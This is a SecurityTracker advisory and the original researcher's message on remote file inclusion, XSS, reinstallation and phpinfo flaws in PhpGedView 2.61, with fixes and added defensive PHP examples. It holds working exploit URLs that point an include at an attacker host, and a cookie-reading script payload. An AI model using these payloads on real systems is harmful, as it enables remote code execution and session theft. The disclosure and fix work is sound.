PhpGedView Input Validation Flaws Let Remote Users Execute Arbitrary Commands

SecurityTracker Alert ID: 1008632
SecurityTracker URL: http://securitytracker.com/id?1008632
CVE Reference: CVE-2004-0030, CVE-2004-0031, CVE-2004-0032, CVE-2004-0033
Updated: Jul 6 2008
Original Entry Date: Jan 7 2004
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included: Yes
Advisory: Vietnamese Security Group
Version(s): 2.61
Description: Several vulnerabilities were reported in PhpGedView. A remote user can execute arbitrary PHP code and operating system commands on the target system.

Windak of Vietnamese Security Group reported that the 'functions.php', 'authentication_index.php', and 'config_gedcom.php' files include other files relative to the $PGV_BASE_DIRECTORY variable [CVE-2004-0030]. A remote user can supply a specially crafted URL to cause a PHP file at a remote location to be included and executed by the target system. Some demonstration exploit URLs are provided:

http://[target]/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker]/
http://[target]/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker]/
http://[target]/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker]/

It is also reported that the 'editconfig.php' file can be invoked by a remote user to re-install the software and change the administrator password [CVE-2004-0031]:

http://[target]/phpgedview_folder/editconfig.php

It is also reported that the 'search.php' file does not filter HTML code from user-supplied input in the 'firstname' variable [CVE-2004-0032]. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PhpGedView software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. A demonstration exploit URL is provided:

http://localhost/phpgedview/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>

It is also reported that a remote user can determine information about the PHP configuration on the target system by using the following type of URL [CVE-2004-0033]:

http://[target]/phpgedview_folder/admin.php?action=phpinfo
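The base-directory flaw above comes down to a require() whose path prefix can be set by the request. As an added example (not PhpGedView's own code), the following PHP shows how a script can fix that prefix from its own location and validate include names before using them; the file names are the ones the advisory lists, the temporary directory and sample inputs are constructed, and the script performs no include itself.

```php
<?php
// Added example, not PhpGedView code: derive the include base from the script's
// own location and validate include names, so that a request parameter such as
// PGV_BASE_DIRECTORY=http://attacker/ (possible under register_globals) can
// never redirect require() to a remote host or an unexpected local file.

/**
 * Reject values that must never be accepted as an include prefix or name:
 * anything carrying a URL scheme (http://, ftp://, php://, ...) or a
 * parent-directory component.
 */
function looks_like_injected_path(string $value): bool
{
    return (bool) preg_match('~^[a-z][a-z0-9+.-]*://|(^|[/\\\\])\.\.([/\\\\]|$)~i', $value);
}

/**
 * Resolve $name inside $base and return its absolute path, or null when the
 * name is not on the allow-list, does not exist, or resolves outside $base.
 */
function safe_include_path(string $base, string $name, array $allowed): ?string
{
    if (looks_like_injected_path($name) || !in_array($name, $allowed, true)) {
        return null;
    }
    $baseReal = realpath($base);
    $fileReal = realpath(rtrim($base, '/\\') . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $fileReal === false) {
        return null;                       // base unresolvable or file missing
    }
    // realpath() collapses ".." and only ever returns real filesystem paths,
    // so a surviving result must be an existing file under $baseReal.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($fileReal, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $fileReal;
}

// Demonstration on a constructed directory: the base is fixed by the script
// (here a temp dir it creates, in a real install __DIR__), never taken from $_GET.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pgv_demo_' . getmypid();
mkdir($base, 0700);
file_put_contents($base . DIRECTORY_SEPARATOR . 'functions_print.php', "<?php\n");

// The only files these scripts legitimately include (names from the advisory).
$allowed = ['authenticate.php', 'functions_print.php', 'theme.php'];

$samples = [
    'functions_print.php',              // legitimate and present
    'theme.php',                        // legitimate name, but not installed here
    'http://attacker.invalid/',         // constructed: the remote prefix from the advisory
    '../../etc/passwd',                 // traversal attempt
];
foreach ($samples as $name) {
    $path = safe_include_path($base, $name, $allowed);
    printf("%-28s %s\n", $name, $path === null ? 'rejected' : 'include ' . $path);
}

unlink($base . DIRECTORY_SEPARATOR . 'functions_print.php');
rmdir($base);
```

Run it with `php demo.php`; only functions_print.php resolves to an include path, the other three are rejected. The allow-list and the realpath() prefix check are the part that matters: they hold even when register_globals is on, whereas relying on the interpreter alone depends on settings (register_globals is off by default since PHP 4.2.0, and remote includes have been gated by allow_url_include since PHP 5.2.0).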
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system. The code and commands will run with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PhpGedView software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can reconfigure the application, including changing the administrative password.

A remote user can determine information about the PHP configuration.

Solution: No solution was available at the time of this entry. An unofficial fix for each flaw is described in the Source Message.

Vendor URL: phpgedview.sourceforge.net/

Cause: Access control error, Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Vietnamese Security Group <security@security.com.vn>

Message History: None.

Source Message Contents

Date: 6 Jan 2004 06:19:55 -0000
From: Vietnamese Security Group <security@security.com.vn>
Subject: Vuln in PHPGEDVIEW 2.61 Multi-Problem

Title : Vuln in PHPGEDVIEW 2.61
Lang : PHP
Author : Windak
Website: www.security.com.vn
Version : PHPGEDVIEW 2.61 Multi-Problem
Introduction :
PHPGEDVIEW is a program that reads GEDCOM project files (default HTML).
Bug :
1) PHP code injection :
Risk : High
- Vulnerable files : functions.php, authentication_index.php, config_gedcom.php
In authentication_index.php file : at line 33 :
require $PGV_BASE_DIRECTORY."authenticate.php";
In functions.php file : at line 35 :
require($PGV_BASE_DIRECTORY."functions_print.php");
In config_gedcom.php file : at line 115 :
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
else {
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
require($THEME_DIR."theme.php");
}
Exploit :
http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/
A script named authenticate.php is put in http://attacker/ ( or functions_print.php , or theme.php put in folder /themes/standard/ )
FIX : add as the first line of the vulnerable files : require("config.php");
2) Config again :
Risk : Medium
If you did not delete the editconfig.php file after installation, an attacker can reinstall and change the administrator password.
Link : http://target/phpgedview_folder/editconfig.php
fix : Delete the editconfig.php file
3) XSS :
Risk : Medium
Exploit :
http://localhost/phpgedview/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>
fix :
Find :
<input type="text" name="firstname" value="<?php if ($action=="soundex") print $firstname; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>
<input type="text" name="lastname" value="<?php if ($action=="soundex") print $lastname; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["search_place"]?></td><td>
<input type="text" name="place" value="<?php if ($action=="soundex") print $place; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["search_year"]?></td><td>
<input type="text" name="year" value="<?php if ($action=="soundex") print $year; size="20" ?>" /></td></tr>
replace with :
<input type="text" name="firstname" value="" /></td></tr>
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>
<input type="text" name="lastname" value="" /></td></tr>
<tr><td><?php print $pgv_lang["search_place"]?></td><td>
<input type="text" name="place" value="" /></td></tr>
<tr><td><?php print $pgv_lang["search_year"]?></td><td>
<input type="text" name="year" value="" /></td></tr>
4) Show server info :
Risk : Low
I can show server info
Link: http://target/phpgedview_folder/admin.php?action=phpinfo
fix :
Find :
if (!isset($action)) $action="";
if ($action=="phpinfo") {
phpinfo();
exit;
}
if (!userIsAdmin(getUserName())) {
header("Location: login.php?url=admin.php");
exit;
}
replace with :
if (!userIsAdmin(getUserName())) {
header("Location: login.php?url=admin.php");
exit;
}
if (!isset($action)) $action="";
if ($action=="phpinfo") {
phpinfo();
exit;
}
=======================================================================
Windak - Vietnamese Security Group
www.security.com.vn
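The search.php and admin.php fixes in the message above can also be done without dropping the form's echo of the previous value. As an added example (not PhpGedView's code), the PHP below escapes the reflected field and puts the administrator check ahead of the action dispatch; the names $action, $firstname, userIsAdmin and getUserName follow the message, but the helper bodies here are stand-ins, and the requests are constructed.

```php
<?php
// Added example, not PhpGedView code. Shows the two server-side fixes from the
// message above: (3) escape reflected search input instead of dropping it, and
// (4) authorize before dispatching any admin.php action.

/**
 * Render one search-form field. The previous value is reflected only after
 * HTML-escaping it, which keeps the "remember my input" behaviour the
 * message's fix removes, while the injected quote and tags become inert text.
 */
function render_search_field(string $name, string $action, string $value): string
{
    $shown = ($action === 'soundex')
        ? htmlspecialchars($value, ENT_QUOTES, 'UTF-8')
        : '';
    return sprintf('<input type="text" name="%s" value="%s" size="20" />',
        htmlspecialchars($name, ENT_QUOTES, 'UTF-8'), $shown);
}

// Stand-ins for PhpGedView's helpers (hypothetical bodies; only the names are
// from the message). $_SESSION is used as a plain array so this runs on the CLI.
function getUserName(): string { return $_SESSION['user'] ?? ''; }
function userIsAdmin(string $user): bool { return $user === 'admin'; }

/**
 * admin.php request handling with the authorization check performed before the
 * action is read, which is the reordering the message proposes. Returns a
 * description of what the page would do instead of calling header()/phpinfo().
 */
function admin_dispatch(array $request): string
{
    if (!userIsAdmin(getUserName())) {
        return 'redirect:login.php?url=admin.php';   // header("Location: ..."); exit;
    }
    $action = $request['action'] ?? '';
    if ($action === 'phpinfo') {
        return 'phpinfo';                            // phpinfo(); exit;
    }
    return 'admin-menu';
}

// Constructed requests.
$payload = '"><script>alert(document.cookie)</script>';   // the string from the message
echo render_search_field('firstname', 'soundex', $payload), "\n";
echo render_search_field('firstname', '', $payload), "\n";

$_SESSION = [];                          // anonymous visitor
echo admin_dispatch(['action' => 'phpinfo']), "\n";
$_SESSION = ['user' => 'admin'];         // authenticated administrator
echo admin_dispatch(['action' => 'phpinfo']), "\n";
```

Run with `php fix_demo.php`: the first line shows the payload rendered inside the value attribute with its quote and angle brackets encoded, and the phpinfo request is answered with a redirect for the anonymous visitor and with the phpinfo branch only for the administrator. Ordering the check first matters more than the phpinfo branch itself: any action added to admin.php later is covered automatically.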